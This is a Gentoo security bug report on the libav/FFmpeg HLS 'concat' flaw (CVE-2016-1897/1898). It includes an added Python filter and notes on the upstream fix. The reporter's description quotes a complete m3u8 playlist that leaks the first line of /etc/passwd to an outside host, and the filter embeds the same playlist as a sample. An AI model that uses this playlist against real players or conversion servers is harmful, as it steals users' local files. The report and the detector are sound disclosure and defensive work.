Bug 571870 (CVE-2016-1897, CVE-2016-1898) - <media-video/libav-11.6: stealing local files with HLS+concat (CVE-2016-{1897,1898})
Status: RESOLVED FIXED
Alias: CVE-2016-1897, CVE-2016-1898
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal minor
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: A4 [glsa cve cleanup]
Keywords:
Depends on: CVE-2016-2326, CVE-2016-3062
Blocks:
Reported: 2016-01-14 10:18 UTC by Agostino Sarubbo
Modified: 2017-05-09 19:55 UTC

Description Agostino Sarubbo gentoo-dev 2016-01-14 10:18:06 UTC
From ${URL} :

Hello!
I found some strange behavior in ffmpeg which can lead to stealing local
files during ffmpeg/ffprobe exec; it also applies to libav.

I've underestimated the impact of this bug, so it was fully disclosed
in this article (in Russian, but Google Translate works fine with
it) - http://habrahabr.ru/company/mailru/blog/274855


In short:
If a Linux user downloads a specially prepared video file (with any
extension: avi/mov/etc.) which contains an HLS m3u8 playlist with the "concat"
protocol in a URL:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

header.m3u8:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://example.org?

If the user launches an ffmpeg-based video player (MPlayer, etc.), the first line
of /etc/passwd will be sent to http://example.org? in a
http://example.org?# $FreeBSD: release/100.0/et..  request.
The same happens when a file manager tries to generate a thumbnail for this
file.

All this can be applied to server-run ffmpeg during video conversion.
The FFmpeg/libav security teams are already notified, but official patches
are not available yet, so you can rebuild ffmpeg with the --disable-network
configure option, which prevents this vulnerability from being exploited.

Moreover, it's always recommended to run ffmpeg in an isolated environment
when processing untrusted files
(googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html).



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Comment 1 GLSAMaker/CVETool Bot gentoo-dev 2016-07-19 02:56:15 UTC
CVE-2016-1898 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1898):
  FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read
  arbitrary files by using the subfile protocol in an HTTP Live Streaming
  (HLS) M3U8 file, leading to an external HTTP request in which the URL string
  contains an arbitrary line of a local file.

CVE-2016-1897 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1897):
  FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read
  arbitrary files by using the concat protocol in an HTTP Live Streaming (HLS)
  M3U8 file, leading to an external HTTP request in which the URL string
  contains the first line of a local file.
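
A content-based pre-check for the playlist trick described in the report and in the two CVE entries above, as an added example that is not part of the original bug report or of libav. It flags HLS playlists whose entries use the concat, subfile or file protocols; the function names and the blocklist are assumptions of this example.

```python
import re

# Protocols named on this page as the file-read primitives (concat in the
# report, subfile in CVE-2016-1898), plus plain file: URLs. The blocklist is an
# assumption of this example; allowing only http/https segments is stricter.
RISKY = re.compile(r"(?:^|(?<=[|:]))(concat|subfile|file)(?=[:,])", re.IGNORECASE)


def is_hls_playlist(data: bytes) -> bool:
    """Detect a playlist by content: the extension (avi, mov, ...) proves nothing."""
    return data.lstrip(b"\xef\xbb\xbf \t\r\n").startswith(b"#EXTM3U")


def risky_entries(data: bytes):
    """Return (line_number, protocol) for each risky protocol on a playlist URI line."""
    if not is_hls_playlist(data):
        return []
    findings = []
    text = data.decode("utf-8-sig", errors="replace")
    for lineno, line in enumerate(text.splitlines(), start=1):
        line = line.strip()
        if not line or line.startswith("#"):
            # Tag and comment lines are skipped; URIs inside tag attributes
            # (for example EXT-X-KEY) are out of scope for this example.
            continue
        # Protocols nest (concat:a|file:b), so report every match on the line.
        for m in RISKY.finditer(line):
            findings.append((lineno, m.group(1).lower()))
    return findings


# Playlist copied from the bug description, as it would sit inside "video.avi".
REPORTED = b"""#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
"""

if __name__ == "__main__":
    for lineno, proto in risky_entries(REPORTED):
        print(f"line {lineno}: entry uses the {proto} protocol, reject before decoding")
```

This is a heuristic filter for upload or thumbnailing pipelines; it complements, and does not replace, the fixed package and the isolation advice in the report.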
Comment 2 Thomas Deutschmann (RETIRED) gentoo-dev 2016-11-25 01:45:34 UTC
Upstream's resolution was to disable concat by default:

https://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v11.6#l7

We have disabled concat as well, https://gitweb.gentoo.org/repo/gentoo.git/tree/media-video/libav/libav-11.6.ebuild?id=699e5ef7bf5d2f62bff41d508796ae60403a8adb#n180
Comment 3 Yury German Gentoo Infrastructure gentoo-dev 2017-04-19 06:10:41 UTC
Added to an existing GLSA Request.

Maintainer(s), please drop the vulnerable version(s).
Comment 4 GLSAMaker/CVETool Bot gentoo-dev 2017-05-09 19:55:30 UTC
This issue was resolved and addressed in
 GLSA 201705-08 at https://security.gentoo.org/glsa/201705-08
by GLSA coordinator Kristian Fiskerstrand (K_F).